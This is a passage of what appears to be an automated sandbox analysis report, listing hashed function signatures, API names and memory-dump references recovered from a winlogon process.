                                                                                                                                          • Instruction Fuzzy Hash: 8E215679628F5093F710CBA9F54835977A1F785796F608215DB5903BA4CF7CC145CB00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                          • Instruction ID: ccd8efdbd64409059a3f17658d38d7afc50ea8cd74631e28eb6d2bb9e49f1cd4
                                                                                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                                          • Instruction Fuzzy Hash: F3E1D37A602F609AEF60DFA9D48839D77E0F749B8BF108115EE8947B99CB34C592C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                          • String ID: api-ms-
                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                          • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                          • Instruction ID: 1846bb63d11909a53191b25e77548844483a8de6adc9bd3f24389271b0a95010
                                                                                                                                          • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                                                                                          • Instruction Fuzzy Hash: 2131E62935EE60F1EE21DBCAA408B653398BB48BA6F5985259D1F0B798DF39C447C300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                          • String ID: CONOUT$
                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                          • Instruction ID: 158becd88709c9cbcacd230cd8387edf0a13bed790f97ee48f9835d8b457c441
                                                                                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                          • Instruction Fuzzy Hash: 5A119135720F6096E7608BDAE84831977A0F788FE6F248225EB5E877A4CF78C914C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Heap$Process$AllocFree
                                                                                                                                          • String ID: dialer
                                                                                                                                          • API String ID: 756756679-3528709123
                                                                                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                          • Instruction ID: 2e98920b3895b546e8cfee93848436d20f1d91fbd890dc42e4983bef65e91d92
                                                                                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                          • Instruction Fuzzy Hash: 9131CE2A309F65A2EB52CFDEE54872A77A0FB44B86F18C1209F4A47B55EF34C4A1C300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 517849248-0
                                                                                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                          • Instruction ID: c75f4c628c11a50a5007a532dfe706c93d8ee4e04b1e1be502c9ae2a36d6589c
                                                                                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                          • Instruction Fuzzy Hash: 0E016929314E5092EB60DB9AA84C35963A1F788BC6F988075DF8A43754DF3CC989C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FinalHandleNamePathlstrlen
                                                                                                                                          • String ID: \\?\
                                                                                                                                          • API String ID: 2719912262-4282027825
                                                                                                                                          • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                          • Instruction ID: e535c0649dfb5c656df934673802aa2881829a80634b4f76755b7f08d64bed47
                                                                                                                                          • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                          • Instruction Fuzzy Hash: 69F04466718E51A2E7608BE9F9887596761F748BC9F94C020DB4A46654DF3CC68DCB00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _set_statfp
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1156100317-0
                                                                                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                          • Instruction ID: 0f0cd1f3b4902091acada321e62a835e8ba03bea7c675b6eead67c7f9176ca24
                                                                                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                          • Instruction Fuzzy Hash: 6B11C63AA60E3131FB6415ECE45D37991C86B58BB6F48C639A97F2E3D6CB34C881C200
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                                                                                          • API String ID: 3215553584-4202648911
                                                                                                                                          • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                          • Instruction ID: 944570b48e0c60bc5ad5e959f3b97a539a301ff4876b6c2567b65f1bc9dbc55e
                                                                                                                                          • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                                                                                          • Instruction Fuzzy Hash: 2961E27E606E6066FE69CBFCE55D32E66A0F785793F54C415EA0A037A4DB34C842C302
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CallEncodePointerTranslator
                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                          • API String ID: 3544855599-2084237596
                                                                                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                          • Instruction ID: 5ee5bc15fcc7ca4683ce8519a978933ac552fc7779cbca0cf07b2e2c35c6d78e
                                                                                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                          • Instruction Fuzzy Hash: 6561CF3B608F94AAEB20DFA9D04439D7BA1F348B8DF148255EF4A17B99DB38C085C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                          • String ID: csm$csm
                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                          • Instruction ID: 4352b4e7d2f757b2eeab07a41cb79b5cce5006a568909e68af21b5ba570d396d
                                                                                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                                                                          • Instruction Fuzzy Hash: 9B51C23A105BA0EAEF748F99944835877A0F355B97F28C215EB89C7BD6CB38C451C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                          • String ID: csm$f
                                                                                                                                          • API String ID: 3242871069-629598281
                                                                                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                          • Instruction ID: 8a2ee0853dea6fc810b70285cdad8afa924fb268fca63da5ab5c18953c58d14e
                                                                                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                                                                          • Instruction Fuzzy Hash: 9F51BF3A712A20AAEF94CF99E448B1937A5F358B9FF52C224DE0647788EB34CC41C704
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                          • String ID: csm$f
                                                                                                                                          • API String ID: 3242871069-629598281
                                                                                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                          • Instruction ID: a13f22b0c5ddbfd73ffef1e451b0b481ee6602808d75d20c911345d57e3c4186
                                                                                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                                                                          • Instruction Fuzzy Hash: A731C03A602B60A6EB64DF5AE84871977A4F748BDFF16C214EE5B47784DB38C940C704
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CallTranslator
                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                          • Instruction ID: 1c103488b81b5755e9a858689f9c8f9220dbcbf2f2fcf3c8ea21b2028d61d58d
                                                                                                                                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                                                                          • Instruction Fuzzy Hash: C5619D3B602F549AEB20CFA9D44439D7BA0F748B8EF148215EF4917B99DB38D156C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorFileLastWrite
                                                                                                                                          • String ID: U
                                                                                                                                          • API String ID: 442123175-4171548499
                                                                                                                                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                          • Instruction ID: ff598f2dff618ae855125180d135eff0feb50115b417593be16094bb43c2f728
                                                                                                                                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                                                                          • Instruction Fuzzy Hash: BC41C476325E90A6DB21CFA9E8483AE77A0F798795F508021EE4E87794EB7CC445C740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: __std_exception_copy
                                                                                                                                          • String ID: ierarchy Descriptor'$riptor at (
                                                                                                                                          • API String ID: 592178966-758928094
                                                                                                                                          • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                          • Instruction ID: 40d697394cd767119a46280874914b4daa5d8e9346db535fcc515f98333aa0ca
                                                                                                                                          • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                                                                          • Instruction Fuzzy Hash: 7EE08661A41F84A0DF118F66E8442D873A0DB58B69B48D122995C46311FA38D1E9C300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891451453.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc610000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: __std_exception_copy
                                                                                                                                          • String ID: Locator'$riptor at (
                                                                                                                                          • API String ID: 592178966-4215709766
                                                                                                                                          • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                          • Instruction ID: 33387b3a89b0f7cf97b4c9f63ea1e6ce0b438a2dcf969175634c70bf0c094b31
                                                                                                                                          • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                                                                          • Instruction Fuzzy Hash: F9E0CD61A01F44D0DF118F65D4441D87360E75CB69F88D222CD4C47311FB38D1E5C300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000016.00000002.2891622087.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_22_2_225dc640000_winlogon.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                          • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                          • Instruction ID: 46137aeb2ac080d4014b8e101a3abee4704eba82c5d2520b876412a79b8151bf
                                                                                                                                          • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                          • Instruction Fuzzy Hash: 77E06D39621E1486EB548FEAD80C36A36E1FB89F06F14C024CA0907751DF7DC499C750
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%